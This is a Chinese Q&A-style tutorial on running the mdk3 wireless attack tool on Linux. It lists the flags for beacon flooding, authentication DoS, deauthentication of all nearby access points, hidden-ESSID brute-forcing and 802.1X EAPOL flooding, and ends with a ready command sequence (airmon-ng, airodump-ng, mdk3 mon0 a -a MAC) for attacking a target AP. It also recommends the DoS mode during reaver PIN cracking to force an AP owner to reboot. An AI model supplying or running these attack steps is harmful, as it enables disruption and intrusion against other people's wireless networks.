在linux 下怎么才能用mdk3 这个命令啊 需要安装软件莫??

在linux 下怎么才能用mdk3 这个命令啊 需要安装软件莫??,第1张

MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能”。

——虽然这几句话被转了N遍,但我们还是以这句话开头;今天就围绕以上提到的几种攻击模式进行简单的折腾下:

首先激活无线网卡至监听模式,然后输入mdk3 --fullhelp查看详细帮助内容

beacon flood mode:

这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。

详细命令如下:

mdk3 mon0 b

-n <ssid> #自定义ESSID

-f <filename> #读取ESSID列表文件

-v <filename> #自定义ESSID和BSSID对应列表文件

-d #自定义为Ad-Hoc模式

-w #自定义为wep模式

-g #54Mbit模式

-t# WPA TKIP encryption

-a #WPA AES encryption

-m #读取数据库的mac地址

-c <chan> #自定义信道

-s <pps> #发包速率

mdk3 --help b #查看详细内容

Authentication DoS:

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由!

mdk3 mon0 a

-a <ap_mac> #测试指定BSSID

-m #使用有效数据库中的客户端mac地址

-c #对应 -a ,不检查是否测试成功

-i <ap_mac> #对指定BSSID进行智能攻击

-s <pps> #速率,默认50

Deauthentication/Disassociation Amok:

这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!

mdk3 mon0 d

-w <filename>#白名单mac地址列表文件

-b <filename> #黑名单mac地址列表文件

-s <pps> #速率,这个模式下默认无限制

-c [chan,chan,chan,...] #信道,可以多填,如 2,4,5,1

Basic probing and ESSID Bruteforce mode:

基本探测AP信息和ESSID猜解模式

mdk3 mon0 p

-e <ssid> #待检测的ssid

-f <filename> #检测AP设置为隐藏的ssid列表文件

-t <bssid> #用bssid检测AP的信息

-s <pps> #速率,默认300

-b <character set> #设置字符集

802.1X tests:

802.1X 协议下的攻击测试

mdk3 mon0 x

0 - EAPOL Start packet flooding #EAPOL格式的报文洪水攻击

-n <ssid>

-t <bssid> #目标客户端的mac地址

-w <WPA type>

Set WPA type (1: WPA, 2: WPA2/RSNdefault: WPA)

-u <unicast cipher>

Set unicast cipher type (1: TKIP, 2: CCMPdefault: TKIP)

-m <multicast cipher>

Set multicast cipher type (1: TKIP, 2: CCMPdefault: TKIP)

-s <pps> #速率,默认400

1 - EAPOL Logoff test #注销认证攻击

-t <bssid> #目标客户端的mac地址

-c <bssid>#目标ap的合法客户端mac

-s <pps>#速率,默认400

打开类似windows的cmd的命令符界面,依次输入ifconfig -a

ifconfig wlan0 up

airmon-ng start wlan0

airodump-ng mon0

mdk3 mon0 a -a MAC 即可


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/8484705.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-16
下一篇 2023-04-16

发表评论

登录后才能评论

评论列表(0条)

保存